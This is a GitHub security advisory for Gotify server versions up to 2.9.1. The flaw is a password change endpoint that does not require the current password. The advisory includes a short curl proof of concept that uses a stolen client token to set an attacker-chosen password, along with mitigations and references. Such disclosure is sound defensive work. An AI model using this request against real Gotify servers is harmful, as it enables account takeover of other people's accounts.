gotify/server · Security
Gotify: Insufficiently Protected Password Change endpoint
- GHSA ID
- GHSA-3hcj-9m7p-wwm9
- CVE ID
- CVE-2026-102603
- Severity
- medium
- Published
- Updated
- CVSS v4
- 5.3 · CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
Description
The password change endpoint (POST /current/user/password) in Gotify versions <= 2.9.1 does not require knowledge of the current password. An attacker in possession of a valid client token can set a new password for the affected user. Recovering the account requires administrator intervention or direct database access.
PoC
# Attacker has obtained a client token
# No prior password knowledge required
STOLEN_TOKEN="Cxxxxxxxxxx"
curl -X POST "http://gotify-host/current/user/password?token=${STOLEN_TOKEN}" \
-H "Content-Type: application/json" \
-d '{"pass":"attacker_controls_this"}'
# Expected response:
# HTTP/1.1 200 OK
Mitigation
- Upgrade to Gotify 3.0.0, which introduces step-up authentication: changing the password now requires re-authenticating with the account password, or
- Restrict access to the state-changing endpoints under
/userand/current/userto trusted networks.
CWEs
- CWE-620 · Unverified Password Change
References
- https://github.com/gotify/server/security/advisories/GHSA-3hcj-9m7p-wwm9 ↗
- https://nvd.nist.gov/vuln/detail/CVE-2026-102603 ↗
- https://github.com/gotify/server/pull/952 ↗
- https://github.com/gotify/server/commit/a8744482c668e07a61798573ec8e17bd3f6009f9 ↗
- https://github.com/gotify/server/releases/tag/v3.0.0 ↗
- https://github.com/advisories/GHSA-3hcj-9m7p-wwm9 ↗